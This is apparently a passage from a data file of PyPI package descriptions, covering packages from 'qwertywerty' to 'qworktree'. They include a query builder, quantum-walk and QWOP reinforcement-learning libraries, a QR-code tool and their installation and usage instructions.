weighted Levensthein distance function.Damerau-Levenshtein distanceLicenseReleased under the MIT license.MIT License\n\nCopyright (c) 2022 Daniele Volpi\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qwertywerty", "pacakge-description": "O2DESPyA python package to perform discrete event simulation.Usage"} +{"package": "qwertywerty123", "pacakge-description": "O2DESPyA python package that performs discrete event simulation"} +{"package": "qwertywertyerty12", "pacakge-description": "O2DESPyA python package to perform discrete event simulation.Usage"} +{"package": "qwery", "pacakge-description": "qweryqwery is a small and lightweight query builder based on asyncpg and pydantic.why a query builderIn my opinion query builders strike a great balance between the flexibility of raw SQL, the structure and safety of pre-crafted queries, and the comfortable data layer of an ORM.These benefits come with some downsides:You lose some flexibility when crafting queries, especially when dealing with things like partial updates.While the query builder interface does providesometyping, its dynamic nature means it can never match the safety of pre-crafted queries with hand-written or generated types.Complex queries returning non-standard data become unruly fast.model, queries, helper patternqwery works best with a model + queries + helper pattern, namely:Models describe only data and how it is storedQueries describe how models interact with the databaseHelpers describe and implement the interactionbetweenmodels and the application (creation, fetching, etc)examplefrompydanticimportBaseModelfromqweryimportQueryclassMyModel(BaseModel):classMeta:table_name=\"my_table\"id:intname:strdesc:Optional[str]active:boolclassMyModelQueries:create=Query(MyModel).insert(body=True).execute()delete_by_id=Query(MyModel).delete().where(\"id = {.id}\").execute()get_by_id=Query(MyModel).select().where(\"id = {.id}\").fetch_one()get_all=Query(MyModel).select().fetch_all()asyncwithpool.acquire()asconn:model=MyModel(id=1,name=\"test\",desc=None,active=True)awaitMyModelQueries.create(conn,model=model)model=awaitMyModelQueries.get_by_id(conn,id=1)models=awaitMyModelQueries.get_all(conn)assertmodels==[model]awaitMyModelQueries.delete(conn,id=1)"} +{"package": "qwest-git", "pacakge-description": "testqweweqeqw"} +{"package": "qwewxsadld", "pacakge-description": "No description available on PyPI."} +{"package": "qwgc", "pacakge-description": "qwgc is a quantum walk graph classifier for classification for Graph data."} +{"package": "qwgraph", "pacakge-description": "AboutThis is the source for the python packageqwgraph.\nThis package's aim is to provide an efficient implementation of quantum walks on graphs.The quantum walk model implemented in this package follows the paperhttps://arxiv.org/abs/2310.10451. This model is specifically designed for searching.Most of the critical functions of this package are implemented and compiled in rust, providing an efficient simulation.An example notebook can be found athttps://github.com/mroget/qwgraph/demo.ipynbInstallation1. From pippip install qwgraphFor windows users, it might be necessary to install the rust toolchain cargo.2. From sourcegit clone git@github.com:mroget/qwgraph.git\ncd qwgraph\n./build.shThe scriptbuild.shwill compile everything and install it as a python package locally on your machine. It requires to install maturin viapip install maturinDependencies+ `numpy`\n+ `matplotlib`\n+ `networkx`\n+ `pandas`\n+ `tqdm`DocumentationThe documentation can be found inhttps://mroget.github.io/qwgraph/"} +{"package": "qwh", "pacakge-description": "No description available on PyPI."} +{"package": "qwhale-client", "pacakge-description": "qwhale-clientThis is the official python client libraryThe library is simple, all you need is a TOKEN that you can get from our websitehareand that it! you are ready to work with our service.The library works withpymongoso you can use it like you use to.code examplefromqwhale_clientimportAPIClientTOKEN=\"\"client=APIClient(TOKEN)withclientasdatabase:print(client.activated)# -> Truedatabase[\"test\"].insert_one({\"key\":\"value\",\"extra\":\"123456\"})document=database[\"test\"].find_one({\"key\":\"value\"})print(document)# -> {\"_id\": ObjectId(...), \"key\": \"value\", \"extra\": \"123456\"}print(client.activated)# -> FalseAnother code examplefromqwhale_clientimportAPIClientTOKEN=\"\"client=APIClient(TOKEN)database=client.get_database()print(client.activated)# -> Truedatabase[\"test\"].insert_one({\"key\":\"value\",\"extra\":\"123456\"})document=database[\"test\"].find_one({\"key\":\"value\"})print(document)# -> {\"_id\": ObjectId(...), \"key\": \"value\", \"extra\": \"123456\"}print(client.close())# -> {'data_saved': True}print(client.activated)# -> False"} +{"package": "qwhale-logs-client", "pacakge-description": "QWhaleLogsClientQWhaleLogs client lib for saving logs in remote serviceInstall$>pipinstallqwhale-logs-clientGet tokenGo tologinAfter the login go toget_tokenLogging exampleimportloggingfromqwhale_logs_clientimportinitinit(token=\"\",batch_site=1)# Init logs capture# The batch site is determine how many logs to send in one request# For fewer sizes more requests are made (default to 100)logging.basicConfig(level=logging.DEBUG,format='%(asctime)s-%(name)s-%(levelname)s-%(message)s')logging.info(\"Some log\")# Normal use# Now your logs are sent to the QWhaleLogsServiceLoguru example (Recommended)fromloguruimportloggerfromqwhale_logs_clientimportinitinit(token=\"\",batch_site=1)# Init logs capture# The batch site is determine how many logs to send in one request# For fewer sizes more requests are made (default to 100)logger.info(\"Some log\")# normal use# Now your logs are sent to the QWhaleLogsService"} +{"package": "qwhatyTuring", "pacakge-description": "# Turing Machines in PythonVisit [the project page](https://github.com/qwhaty/Python-Turing-Machine) for more information"} +{"package": "qwhois", "pacakge-description": "whoiswhois\u67e5\u8be2\u670d\u52a1\u5305\u5b89\u88c5pipinstallqwhois\u4f7f\u7528fromqwhoisimportwhoisprint(whois('baidu.com'))"} +{"package": "qwif", "pacakge-description": "qwifGenerate QR codes for WIFI and more from the command line.Requirementspython 3.8+InstallingInstall and update usingpip:pip install -U qwifAlternatively, you can package and runqwifin a docker container:make imageUsageqwifsupports a number of QR code content types through subcommands.To generate a QR code for WIFI configuration:qwif wifi --ssid test --password testTo generate a QR code to configure e.g. Google Authenticator:qwif otp --secret test --issuer \"Big Corp\" --account_name test@test.localA list of subcommands can be printed by runningqwif --help.Each has its own help menu detailing the supported parameters for each QR code\ntype.Authorsiwaseatenbyagrue"} +{"package": "qwiic-exporter", "pacakge-description": "qwiic_exporterPrometheus exporter for SparkFun OpenLog Artemis QWIIC sensors, written in Python"} +{"package": "qwikcrud", "pacakge-description": "qwikcrudqwikcrudis a powerful command-line tool designed to enhance your backend development experience by automating the\ngeneration of comprehensive REST APIs and admin interfaces. Say goodbye to the tedious task of\nwriting repetitive CRUD (Create, Read, Update, Delete) endpoints when starting a new project, allowing developers to\nconcentrate on the core business logic and functionality.[!WARNING]\nThe generated application is not ready for production use. Additional steps are required to\nset up a secure and production-ready environment.Table of ContentsInstallationQuickstartEnvironment variablesUsageGenerated Application stackRoadmapContributingAcknowledgmentsLicenseInstallationpipinstallqwikcrudQuickstartEnvironment variablesBefore running the command-line tool, ensure the following environment variables are configured:GoogleexportGOOGLE_API_KEY=\"your_google_api_key\"OpenAIexportOPENAI_API_KEY=\"your_openai_api_key\"exportOPENAI_MODEL=\"your_openai_model\"# Defaults to \"gpt-3.5-turbo-1106\"UsageTo generate your application, open your terminal, run the following command and follow the instructions:Googleqwikcrud-ooutput_dirOpenAIqwikcrud-ooutput_dir--aiopenaiGenerated Application stackFastAPISQLAlchemy v2Pydantic v2Starlette-adminSQLAlchemy-fileExamplesTask\nManagement (prompt,generated app)Roadmapqwikcrudis designed to support various frameworks and AI providers. Here's an overview of what has been accomplished\nand\nwhat is planned for the future:FrameworksFastAPI + SQLAlchemyRestful APIsAdmin interfacesAuthenticationFastAPI + BeanieSpring BootAI providersGoogle (default)OpenAIAnthropicOllama (self-hosted LLMs)Pricingqwikcrudmakes one API call per prompt and add a system prompt of around 900 tokens to\nyour prompt.Google: Currently free.OpenAI: With the default gpt-3.5-turbo model, each app generation costs approximately $0.003. The exact cost can\nvary slightly based on the model selected and the output lengthContributingContributions are welcome and greatly appreciated! If you have ideas for improvements or encounter issues, please feel\nfree to submit a pull request or open an issue.AcknowledgmentsThe FastAPI + SQLAlchemy template is inspired by the excellent work\ninfull-stack-fastapi-postgresqlby [Sebastian Ramirez (tiangolo)].Licenseqwikcrudis distributed under the terms of theApache-2.0license."} +{"package": "qwikidata", "pacakge-description": "qwikidatais a Python package with tools that allow you to interact withWikidata.The package defines a set of classes that allow you to represent Wikidata entities\nin a Pythonic way. It also provides a Pythonic way to access three data sources,linked data interfacesparql query servicejson dumpQuick InstallRequirementspython >= 3.5Install with pipYou can install the most recent version using pip,pipinstallqwikidataQuick ExamplesPlease see the,examples folderORreadthedocsLicenseLicensed under the Apache 2.0 License. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \u201cAS IS\u201d BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.CopyrightCopyright 2019 Kensho Technologies, LLC.Important Linksreadthedocs|PyPI|github"} +{"package": "qwikstart", "pacakge-description": "qwikstart: Code generator for fun and profitDocumentation:https://qwikstart.readthedocs.ioSource:https://github.com/tonysyu/qwikstartqwikstartis a code generator for integrating code into existing projects. It\u2019s\nsimilar to code generators likecookiecutter,yeoman, andhygenbut with a focus on\nadding code to existing projects.A simplehello-world.ymlscript in qwikstart would look something like:steps:\"Askforname\":name:promptinputs:-name:\"name\"default:\"World\"\"Displaymessage\":name:echomessage:|Hello, {{ qwikstart.name }}!The first step uses thepromptoperation with a single input\"name\", with a default\nvalue of\"World\"(which is editable when running the script). The next step just uses\ntheechooperation to display a message. This script can be usingqwikstart run:$qwikstartrunhello-world.ymlPleaseenterthefollowinginformation:name:WorldHello,World!InstallThe recommended way of installingqwikstartis to usepipx:pipxinstallqwikstartIf you happen to be setting uppipxfor the first time, thepipx installation instructionssuggest runningpipx ensurepathto update\nthe user path. Note, if you use~/.profileinstead of~/.bash_profile,\nthis will add~/.bash_profile, which will take precendence over~/.profile.\nEither move the code from~/.bash_profileto~/.profileorlink your profiles.Basic UsageAfter installingqwikstart, you can run a simple hello-world example using the\nfollowing:$qwikstartrun--repohttps://github.com/tonysyu/qwikstartexamples/hello_world.ymlBy default, there are abbreviations for common git repos, so the above can also be\nwritten:qwikstartrun--repogh:tonysyu/qwikstartexamples/hello_world.ymlSee AlsoThere are a lot code generators and scaffolding tools out there, and the following is\njust a selection of some of the most popular ones:cookiecutter: A command-line utility that creates projects from cookiecutters\n(project templates)hygen: The scalable code generator that saves you time.yeoman: The web\u2019s scaffolding tool for modern webapps"} +{"package": "qwilfish", "pacakge-description": "IntroductionQwilfish is a Python package for fuzzing various Ethernet-related protocols.\nIt is a work in progress and the first goal is grammar-based generation of\nLLDP frames (IEEE 802.1AB).[[TOC]]InstallationPrerequisitesA Linux systemPython3.8 (higher versions will probably work too, but no guarantees)Root privileges (for changing the capabilities of Python binary)Create a virtual environmentIt is recommended to create a virtual environment first:$ python -m venv venv\n$ source venv/bin/activateInstall with pipTo install Qwilfish simply type:$ pip install qwilfishInstall from sourceTo install Qwilfish from source type:$ git clone https://gitlab.com/zluudg/qwilfish.git\n$ cd qwilfish\n$ pip install .Qwilfish also supports an editable install:$ pip install -e .Setting capabilitiesQwilfish writes packets to raw sockets, which is prohibited for normal users.\nIt is not recommended to install or run Qwilfish as root, however.\nInstead, change the capabilities of your Python binary:$ sudo setcap cap_net_raw=eip /path/to/python/binaryUsageBasic usageQwilfish can be invoked without any commands:$ qwilfishIt will then send one fuzzed LLDP packet on the loopback interface.To send ten packets on the loopback interface, type:$ qwilfish -c 10Set logging level to DEBUG:$ qwilfish -dAdvanced ConfigurationThere are some possibilities to configure a Qwilfish session beyond what is\noffered by the CLI. Please refer tothis guidefor more info.Writing PluginsCertain components in Qwilfish can be replaced in a plugin fashion. For more\ninfo check outthis guide.CreditThis project is more than heavily inspired byThe Fuzzing Book. Be sure to check it out!"} +{"package": "qwilprobe", "pacakge-description": "Welcome to Qwilprobe!"} +{"package": "qwitch", "pacakge-description": "QwitchQwitch is a CLI which allows you to watch streams and videos from Twitch directly in Quicktime on macOS.Avoid using unoptimized websites and enjoy Twitch simply via a few commands and the fast and reliable Quicktime player.\nThis also allows you to AirPlay your favorite livestreams and videos on other devices.RequirementsTo install Qwitch you will need to have installed Python >= 3.8 and the XCode Command Line Tools.What's beautiful is that you can get these two requirement installed with only one command since XCode Command Line Tools will also install a compatible version of python3. All you need to do is run the following commandxcode-select --installThis will prompt you to install XCode Command Line Tools on your environment. Now you should be able to run python and pip commands.InstallationQwitch is available via pip only. Simply run the following command to install it:pip3 install --user qwitchOnce that's done, you'll be able to use Qwitch directly in the terminal. On the first use, the CLI will ask you two things:The value of Twitch's auth-token cookieFor you to allow Qwitch to have access to a few things on your Twitch accountFirst, open your favorite web browser and log into your Twitch account. Then you'll need the value of the auth-token cookie. To grab it:Right-click anywhere on Twitch's webpageClick on \"Inspect Element\" or \"Inspect\"Navigate to the \"Storage\" or \"Application\" tab on the little window that openedExpand the \"Cookies\" folderClick on \"twitch.tv\"Search for the \"auth-token\" entry and copy its value (a 30-character string containing numbers and letters)Alternatively, you can use a browser extension like cookies.txt for Firefox. This will generate a text file in which you'll need to search for the \"auth-token\" entry.Well done! You'll need this to set up Qwitch.Now you can use Qwitch in the terminal and it will ask you for this token in due time. It will also prompt you to give it access to a few information from your Twitch account. To do so it will automatically open your web browser, you'll need to accept, and then copy and paste the URL of the page back to Qwitch.How to useHere are a few examples of how to achieve certain tasks with Qwitch:See which streamers you follow are live nowThis is rather simple, simply enter the command below:qwitch -sThe option-sis short for--streams. Qwitch will get the list of streamers you follow and display which ones are live now, with information about their stream.List the streamers you follow and their channel nameThis is rather simple, simply enter the command below:qwitch -fThe option-fis short for--follows. Qwitch will get the list of streamers you follow and display information about their channel.Most important information is their channel name displayed in red, which Qwitch needs when you search for their videos or streams.Watch this streamer's liveSay your favourite streamer is live and you want to watch their stream. Then all you'll need is the name of their channel. For example, if I want to watch Critical Role live, and I know the name of their channel iscriticalrolethen I use the following command to launch their livestream:qwitch -s criticalroleTo know your streamer's channel name either useqwitch -s, if they are live then the channel name will be written in red. Otherwise, look at Twitch's link to their channel. In Critical Role's example it would behttps://twitch.tv/criticalroleso their channel name iscriticalrole.Alternatively you can list the streamers you follow withqwitch -fand the channel names will be displayed in red.Watch this streamer's last videoYou can watch a streamer's last video with the-loption (short for--last), like so:qwitch -l channelnameand replacingchannelnameby the streamer's actual channel name.List a streamer's last 20 videosYou can list a streamer's last 20 videos with the-V(or--Videos) option, like so:qwitch -V channelnameand replacingchannelnameby the streamer's actual channel name.This will list the videos one by one, and ask you each time if you want to watch the video. Simply entery, for yes, orn, for no, and hit\u23ce Enter.Search and watch a streamer's videoTo search and watch one of the streamer's last 20 videos, you can use the-v(short for--vod) either with a video ID or by using keywords from the video's title.A video ID can be obtained from the video'stwitch.tvlink (e.g.https://twitch.tv/videos/524717693the video ID is524717693), or after usingqwitch -V channelnameto list channelname's last 20 videos. Once the video ID is obtained you can watch it with:qwitch -v wherehas to be replaced with the actual video ID (e.g.524717693).To search for a video with a keyword(s), specify the keyword in quotation marks followed by the channel name. Like so:qwitch -v \"some keywords\" channelnameThis will search for a video with the title containing exactlysome keywordsin channelname's last 20 videos. The keywords you use have to be an exact match (up to letter case) because Twitch does not have any search engine to search for videos.Adjust the video qualityYou can adjust a video's playback quality by telling Qwitch which video quality you want it to use. This is done by passing a video quality tag in the command (i.e. one of160p,360p,480p,720por1080p) like so:qwitch -s criticalrole 480pThis works with any qwitch command that can play a video.By default qwitch will use the best available quality. However, you can override this by setting thedefault-streamoption in Qwitch's config file.Qwitch's config fileQwitch's config file is located at~/Library/Application Support/qwitchand is namedconfig.json. This file contains two entries:The first one contains information about you as a twitch user (this stays on your system, Qwitch doesn't collect any of your information), i.e. your tokens to log into twitch from the CLIThe second one contains all theStreamlinkoptions that are needed to power QwitchYou can add Streamlink options to the second part of the config file in a JSON format. For example, you can add thedefault-streamStreamlink option to specify the default stream quality Qwitch should use. With this option, Qwitch's config file would look like[{\"client_id\":\"qwer9tyuiopasdf0ghjkllzxcv4bnm\",\"login\":\"username\",\"scopes\":[\"user:read:follows\",\"user_read\",\"user_subscriptions\"],\"user_id\":\"12345678\",\"expires_in\":4932814,\"access_token\":\"zxc6vbnm7asdfg3hjklqwert8yuiop\",\"requested_at\":1682178117},{\"twitch-api-header\":\"Authorization=OAuth asdfghjkl4qwertyui9nbvc2qwerty\",\"default-stream\":\"720p\"}]More options for Streamlink can be found on their website. Options that are boolean, need to be added in JSON format, i.e. you will need to specifyTrueorFalseas value for the key.Something wrong?If you find something's not right or you have some trouble setting things up, don't hesitate to create an issue on Qwitch's GitHub repository and I'll do my best to help you."} +{"package": "qwixtractor", "pacakge-description": "qwixtractorExtract data from the Quarterly Workforce IndicatorsInstallation$pipinstallqwixtractorUsageTODOContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licenseqwixtractorwas created by Rodrigo Franco. It is licensed under the terms of the MIT license.Creditsqwixtractorwas created withcookiecutterand thepy-pkgs-cookiecuttertemplate."} +{"package": "qwlist", "pacakge-description": "Qwery ListQList is a small library introducing a new way to use higher order functions\nwith lists, withlazy evaluation. It also aims to address ugly\npython list methods such as map, filter and reduce. Whoever invented this:xs=['1','2','3','4']s=reduce(lambdaacc,x:acc+x,filter(lambdax:x<3,map(int,xs)),0)must reevaluate their life choices (yes, I am being cocky and most likely dumdum) but listen\nto me first and look what the world of lazy evaluation has to offer!xs=QList(['1','2','3','4'])s=xs.map(int).filter(lambdax:x<3).fold(lambdaacc,x:acc+x,0)As a bonus you getlen()method, so no longer will you be forced to wrapp your\nlists in this type of codelen(xs)and simply callxs.len()(I understand it is negligibly\nslower but look how much nicer it looks!)Quick tutorialLet's say we want to read numbers from a file and choose only the even ones. No problem at all!fromqwlistimportQListwithopen('path/to/file.txt','r')asfile:qlist=QList(file.readlines())even=qlist.map(int).filter(lambdax:x%2==0).collect()Why is there thiscollectat the end? Because all operations on the QList arelazy evaluated,\nso in order to finally apply all the operations you need to express that.There is also an eagerly evaluatedEagerQListin case all the actions performed on the list should\nbe evaluated instantaneously. This object is in theqwlist.eagermodule, but it is also\npossible to transformQListintoEagerQListsimply by callingeager()>>>fromqwlistimportQList>>>QList(range(3)).eager().map(str)['0','1','2']EagerQList has the same methods that QList has (filter,map,foreach, ...) but not lazy evaluated so\nthere is no need to callcollectat the end.ExamplesMaking QList from an iterable>>>QList([1,2,3,4])[1,2,3,4]Making QList from a generator>>>QList(range(3))[0,1,2]Making a list of pairs:intandstr>>>qlist=QList([1,2,3])>>>qlist.zip(qlist.map(str)).collect()[(1,'1'),(2,'2'),(3,'3')]Summing only the even numbers>>>QList(range(10)).filter(lambdax:x%2==0).fold(lambdaacc,x:acc+x,0)20Side noteThis syntax resemblesRustsyntax:RustPythonletxs=vec![1,2,3,4];letdouble_xs:Vec=xs.iter().map(|&x|x*2).collect();println!(\"{double_xs:?}\");// [2, 4, 6, 8]xs=QList([1,2,3,4])double_xs=xs.map(lambdax:x*2).collect()print(double_xs)# [2, 4, 6, 8]Story behind this whole ideaPrime idea?Vicious mockery!During studying, I had to do a lot of list comprehensions in Python, alongside\nmethods such asmaporfilterand although they are quite powerful, using them\nin Python is just annoying. Combining them makes you read the code in an unnatural order going\nfrom right to left. That is the main reason that for a long time I preferred simple for-loops\nas opposed to using mentioned methods. Until one day my teacher asked the whole class why no one is using\nlist comprehensions and higher order functions.\"Do you guys know python?\" he asked tendentiously.\"I would use those functions if they were nicer\" I thought.During that period I also learnt Rust and immediately fell for it. Especially with how convenient\nit is to replace for-loops with method calls. And that's how the idea for a python packageqwlistwas born.I hereby announce that UwU, Qwery Listwu!"} +{"package": "qW-Map", "pacakge-description": "qW-Map: Weight Re-Mapping for Variational Quantum CircuitsA PyTorch implementation of Quantum Weight Re-MappingIn recent years, quantum machine learning has seen a substantial increase in the use of variational quantum circuits (VQCs). VQCs are inspired by artificial neural networks, which achieve extraordinary performance in a wide range of AI tasks as massively parameterized function approximators. VQCs have already demonstrated promising results, for example, in generalization and the requirement for fewer parameters to train, by utilizing the more robust algorithmic toolbox available in quantum computing. A VQCs' trainable parameters or weights are usually used as angles in rotational gates and current gradient-based training methods do not account for that. We introduce weight re-mapping for VQCs, to unambiguously map the weights to an interval of length $2\\pi$, drawing inspiration from traditional ML, where data rescaling, or normalization techniques have demonstrated tremendous benefits in many circumstances. We employ a set of five functions and evaluate them on the Iris and Wine datasets using variational classifiers as an example. Our experiments show that weight re-mapping can improve convergence in all tested settings. Additionally, we were able to demonstrate that weight re-mapping increased test accuracy for the Wine dataset by $10%$ over using unmodified weights.Link to Arxiv PaperImplemented FunctionsInstall$ pip install qw-mapExample:importpennylaneasqmlfromqw_mapimporttanhfromtorchimportTensordefcircuit(ws:Tensor,x:Tensor):qml.AngleEmbedding(x,rotation='X',wires=range(num_qubits))qml.StronglyEntanglingLayers(tanh(ws),wires=range(num_qubits))CitationTODO"} +{"package": "qwop-fast", "pacakge-description": "qwop-fast: A fast implementation of QWOP simulatorSame API ashttps://web.stanford.edu/class/cs168/qwop.py, but much faster.Installpip install qwop-fastBuild From SourceInstall Rust:https://rustup.rs/Install Maturin:pip install maturinBuild and install the package:maturin develop --releaseUse it:You can just follow the API ofhttps://web.stanford.edu/class/cs168/qwop.pyand just replaceimport qwopwithimport qwop_fast.importnumpyasnpimportqwop_fastplan=np.random.uniform(-1,1,40)qwop_fast.sim(plan)# return a floatYou can also simulate in batches. Batches will be executed in parallel.importnumpyasnpimportqwop_fastplan=np.random.uniform(-1,1,(100,40))qwop_fast.sim_batch(plan)# return a list of floats"} +{"package": "qwop-gym", "pacakge-description": "QWOP GymA Gym environment for Bennet Foddy's game calledQWOP.Give it a tryand see why it's such a\ngood candidate for Reinforcement Learning :)You should also check thisvideofor a demo.FeaturesA call to.step()advances exactly N game frames (configurable)Option to disable WebGL rendering for improved performanceSatisfies the Markov property *State extraction for a slim observation of 60 bytesReal-time visualization of various game stats (optional)Additional in-game controls for easier debugging* given the state includes the steps since last hard reset, see\u267b\ufe0f ResettingGetting startedInstallPython3.10 or higherInstall a chrome-based web browser (Google Chrome, Brave, Chromium, etc.)Downloadchromedriver116.0 or higherInstall theqwop-gympackage and patch QWOP.min.js from your terminal:pipinstallqwop-gym# Fetch & patch QWOP source codecurl-sLhttps://www.foddy.net/QWOP.min.js|qwop-gympatchCreate an instance in your code:importqwop_gymenv=gym.make(\"QWOP-v1\",browser=\"/browser/path\",driver=\"/driver/path\")Theqwop-gymtoolTheqwop-gymexecutable is a handy command-line tool which makes it easy to\nplay, record and replay episodes, train agents and more.Firstly, perform the initial setup:qwop-gym bootstrapPlay the game (use Q, W, O, P keys):qwop-gymplayExplore the other available commands:$qwop-gym-h\nusage:qwop-gym[options]\n\noptions:-h,--helpshowthishelpmessageandexit-cFILEconfigfile,defaultstoconfig/.yml\n\naction:playplayQWOP,optionallyrecordingactionsreplayreplayrecordedgameactionstrain_bctrainusingBehavioralCloning(BC)train_gailtrainusingGenerativeAdversarialImitationLearning(GAIL)train_airltrainusingAdversarialInverseReinforcementLearning(AIRL)train_ppotrainusingProximalPolicyOptimization(PPO)train_dqntrainusingDeepQNetwork(DQN)train_qrdqntrainusingQuantileRegressionDQN(QRDQN)spectatewatchatrainedmodelplayQWOP,optionallyrecordingactionsbenchmarkevaluatetheactions/sachievablewiththisenvbootstrapperforminitialsetuppatchapplypatchtooriginalQWOP.min.jscodehelpprintthishelpmessage\n\nexamples:qwop-gymplayqwop-gym-cconfig/record.ymlplayFor example, to train a PPO agent, editconfig/ppo.ymland run:pythonqwop-gymtrain_ppo[!WARNING]\nAlthough no rendering occurs during training, the browser window must remain\nopen as the game is actually running at very high speeds behind the curtains.Visualize tensorboard graphs:tensorboard--logdirdata/Configuremodel_fileinconfig/spectate.ymland watch your trained agent play the game:pythonqwop-gymspectateImitation[!NOTE]\nImitation learning is powered by theimitationlibrary, which\ndepends on the deprecatedgymlibrary which makes it incompatible with\nQwopEnv. This can be resolved as soon asimitationintroduces support forgymnasium. As a workaround, you can checkout theqwop-gymproject\nlocally and use thegym-compatbranch instead.# In this branch, QwopEnv works with the deprecated `gym` librarygitcheckoutgym-compat# Note that python-3.10 is required, see notes in requirements.txtpipinstall-rrequirements.txt# Patch the game again as this branch works with different pathscurl-sLhttps://www.foddy.net/QWOP.min.js|python-msrc.game.patcherFor imitation learning, first record some of your own games:pythonqwop-gym.pyplay-cconfig/record.ymlTrain an imitator viaBehavioral Cloning:pythonqwop-gym.pytrain_bcW&B sweepsIf you are a fan ofW&B, you can\nuse the provided configs inconfig/wandb/and create your own sweeps.wandbis a rather bulky dependency and is not installed by default. Install\nit withpip install wandbbefore proceeding with the below examples.# create a new W&B sweepwandbsweepconfig/wandb/qrdqn.yml# start a new W&B agentwandbagent/qwop/You can check out my W&B public QWOP projecthere.\nThere you can find pre-trained model artifacts (zip files) of some\nwell-performing agents, as well as see how they compare to each other. Thisyoutube videoshowcases some of\nthem.Developer documentationInfo about the Gym env can be foundhereDetails about the QWOP game can be foundhereSimilar projectshttps://github.com/Wesleyliao/QWOP-RLhttps://github.com/drakesvoboda/RL-QWOPhttps://github.com/juanto121/qwop-aihttps://github.com/ShawnHymel/qwop-aiIn comparison, qwop-gym offers several key features:the env isperformant- perfect for on-policy algorithms as observations\ncan be collected at great speeds (more than 2000 observations/sec on an Apple\nM2 CPU - orders of magnitute faster than the other QWOP RL envs).the env satisfies theMarkov property- there are no race conditions and\nrandomness can be removed if desired, so recorded episodes are 100% replayablethe env has asimple reward modeland compared to other QWOP envs, it is\nless biased, eg. no special logic for stuff likeknee bending,low torso height,vertical movement, etc.the env allows all possible key combinations (15), other QWOP envs usually\nallow only the \"useful\" 8 key combinations.great results (fast, human-like running) achieved by RL agents trained\nentirely through self-play, without pre-recorded expert demonstrationsqwop-gym already contains scripts for training with 6 different algorithms\nand adding more to the list is simple - this makes it suitable for exploring\nand/or benchmarking a variety of RL algorithms.qwop-gym uses reliable open-source implementations of RL algorithms in\ncontrast to many other projects using \"roll-your-own\" implementations.QWOP's original JS source code is barely modified: 99% of all extra\nfunctionality is designed as a plugin, bundled separately and only a \"diff\"\nof QWOP.min.js is published here (in respect to Benett Foddy's kind request\nto refrain from publishing the QWOP source code as part of isnotopen-source).CaveatsThe below list highlights some areas in which the project could use some\nimprovements:the OS may put some pretty rough restrictions on the web browser's rendering\nas soon as it's put in the background (on OS X at least). Ideally, the browser\nshould run in a headless mode, but I couldn't find a headless browser that can\nsupport WebGL.gymis deprecated since October 2022, but theimitationlibrary still\ndoes not officially supportgymnasium. As soon as that is addressed, there\nwill no longer be required to use the specialgym-compatbranch here for\nimitation learning.wandbuses a monkey-patch for collecting tensorboard logs which does not\nwork well with GAIL/AIRL/BC (and possibly other algos fromimitation). As a\nresult, graphs in wandb have weird names. This is mostly an issue withwandband/orimitationlibraries, however there could be a way to work around this\nhere.firefox browser and geckodriver are not supported as an alternative\nbrowser/driver pair, but adding support for them should be fairly easyContributingHere is a simple guide to follow if you want to contribute to this project:Find an existing issue to work on or submit a new issue which you're also\ngoing to fix. Make sure to notify that you're working on a fix for the issue\nyou picked.Branch out from latestmain.Make sure you have formatted your code with theblackformatter.Commit and push your changes in your branch.Submit a PR."} +{"package": "qworder", "pacakge-description": "No description available on PyPI."} +{"package": "qworker", "pacakge-description": "QueueWorkerQueueWorker is asynchronous Task Queue implementation built to\nwork withasyncio.\nCan you spawn distributed workers to run functions inside workers and outside of\nevent loop.QueueWorkerrequires Python 3.8+ and is distributed under MIT license.How do I get set up?First, you need to instal QueueWorker:.. code-block ::pip install qworkerThen, you can start several workers (even sharing the same port):.. code-block ::qw --host --port --workerwhereis a hostname of the serveris a port that server will listen onis a number of worker processesLicenseQueueWorker is copyright of Jesus Lara (https://phenobarbital.info) and is under MIT license. I am providing code in this repository under an open source license, remember, this is my personal repository; the license that you receive is from me and not from my employeer."} +{"package": "qworkerd", "pacakge-description": "A baseline Django/Celery worker extensible by configured imports."} +{"package": "qworker_sample", "pacakge-description": "UNKNOWN"} +{"package": "qworktree", "pacakge-description": "qworktreeqworktreeis a simple tool to permit to manage a qt worktree without managing the main xxx.pro.It is designed to create the main pro file at the root path of the tree (where you execute it it.It have some containts that I does not arrive to remove:need to declate the MK_FEATURE elementgenerate 2 file in the root directory![Badge](https://badge.fury.io/py/qworktree.pngInstructionsThis tool is to create the main .pro file of your worktreeqworktree is under a FREE license that can be found in the LICENSE file.\nAny contribution is more than welcome ;)git repositoryhttp://github.com/HeeroYui/qworktree/InstallationRequirements:Python >= 2.7andpipJust run:pip install qworktreeInstall pip on debian/ubuntu:sudo apt-get install pipInstall pip on ARCH-linux:sudo pacman -S pipInstall pip on MacOs:sudo easy_install pipUsageDownload your worktree and run the commandqworktree\nexport QMAKEFEATURES=`pwd`/mkfeatures\nmkdir build\ncd build\nqmake ..the qworktree will generate local filesfolder_name.pro ==> the file of the worktree description\ndefines.prf ==> a file that define a list of dependency macroCreating the needed elements1: Need a mkfeature to add an include to determine the main root worktree:mkfeatures/root_directory.prfROOT_DIRETORY += $${PWD}/..\nROOT_DEFINES += $${PWD}/../defines.prf\nload(../defines.prf)2: Create a file in your library/plugin/application folder:folderName/qworktree_folderName.py#!/usr/bin/python\n# -*- coding: utf-8 -*-\ndepend_on = 